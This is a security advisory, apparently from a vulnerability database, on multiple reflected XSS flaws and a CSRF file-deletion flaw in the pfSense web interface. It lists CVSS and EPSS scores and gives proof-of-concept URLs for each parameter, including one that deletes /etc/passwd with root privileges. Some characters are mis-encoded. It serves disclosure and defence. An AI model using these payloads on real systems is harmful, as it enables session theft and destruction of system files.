6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.899 High
EPSS
Percentile
98.5%
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks.
Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administratorβs cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface.
1.1 Input passed via the βzoneβ HTTP GET parameter to β/status_captiveportal.phpβ script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS βalert()β function to display βImmuniWebβ popup:
https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%2 7ImmuniWeb%27%29;%3C/script%3E
1.2 Input passed via the βifβ and βdragtableβ HTTP GET parameters to β/firewall_rules.phpβ script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Below are two PoC codes for each vulnerable parameter that use JS βalert()β function to display βImmuniWebβ popup:
https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscrip t%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3 E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.3 Input passed via the βqueueβ HTTP GET parameter to β/firewall_shaper.phpβ script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS βalert()β function to display βImmuniWebβ popup:
https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E% 3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.4 Input passed via the βidβ HTTP GET parameter to β/services_unbound_acls.phpβ script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS βalert()β function to display βImmuniWebβ popup:
https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Eal ert%28%27ImmuniWeb%27%29;%3C/script%3E
1.5 Input passed via the βfilterlogentries_timeβ, βfilterlogentries_sourceipaddressβ, βfilterlogentries_sourceportβ, βfilterlogentries_destinationipaddressβ, βfilterlogentries_interfacesβ, βfilterlogentries_destinationportβ, βfilterlogentries_protocolflagsβ and βfilterlogentries_qtyβ HTTP GET parameters to β/diag_logs_filter.phpβ script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Below are eight PoC codes for each vulnerable parameter that use JS βalert()β function to display βImmuniWebβ popup:
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/scrip t%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/ script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/scrip t%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script% 3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentri es_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in β/system_firmware_restorefullbackup.phpβ script. A remote attacker can trick a log-in administrator to visit a malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges.
The following PoC code deletes file β/etc/passwdβ:
https://[host]/system_firmware_restorefullbackup.php?deletefile=β¦/etc/passw d